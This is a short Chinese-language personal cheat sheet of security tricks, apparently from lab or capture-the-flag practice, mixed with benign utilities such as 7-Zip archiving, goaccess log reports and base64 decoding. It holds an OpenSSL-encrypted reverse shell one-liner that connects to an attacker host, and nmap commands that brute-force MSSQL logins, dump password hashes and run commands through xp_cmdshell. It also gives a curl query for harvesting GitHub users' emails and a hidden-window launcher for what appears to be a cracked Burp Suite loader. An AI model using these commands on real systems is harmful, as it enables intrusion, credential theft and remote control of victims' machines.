随手记一些技巧向的东西,可能没什么用
OpenSSL加密反弹Shell
#生成证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
#开启监听
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>
#反弹Shell
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
Github查找账号的注册邮箱:
curl https://api.github.com/repos/{owner}/{repo}/commits|cat|grep "email"
运行Burpsuite时隐藏Bat文件的窗口:
# Create File BurpLoader.bat
powershell -windowstyle hidden "java -javaagent:BurpSuiteLoader_v2021.2.1.jar -noverify -jar burpsuite_pro_v2021.2.1.jar"
批量打包并加密文件:
import os
loc_7z = r'"C:/Program Files/7-Zip/7z.exe"'
output_file = 'archive.zip'
archive_dir = 'archive/dir/'
command = loc_7z+' a ' + ' -p123456 ' + output_file + archive_dir
os.system(command)
使用goaccess解析日志并导出HTML文件
goaccess access* --log-format COMMON -o report.html
python 解码Base64编码的文件
import base64
j='dGVzdAo=' #Base64 string here
with open('output.file','wb') as w:
stream=base64.b64decode(j)
w.write(stream)
java去混淆工具:
Linux的数据流重定向
文件描述符:
0 - 标准输入
1 - 标准输出
2 - 错误输出
2>&1 - 把错误输出重定向到标准输出
nmap获取MSSQL信息
#获取信息
nmap 10.4.16.254 -p1433 --script ms-sql-ntlm-info
nmap 10.4.16.254 -p1433 --script ms-sql-info
#暴力破解
nmap 10.4.16.254 -p1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt
nmap -p1433 10.4.25.148 --script ms-sql-empty-password
#提取sys users
nmap -p1433 10.4.25.148 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,mssql.database=master,ms-sql-query.query="select * from syslogins" -oN output.txt
# hash dump
nmap -p1433 10.4.25.148 --script ms-sql-dump-hashes --script-args mssql.password=anamaria,mssql.username=admin
#执行命令
nmap -p1433 10.4.25.148 --script ms-sql-xp-cmdshell --script-args mssql.password=anamaria,mssql.username=admin,ms-sql-xp-cmdshell.cmd="type c:\\flag.txt"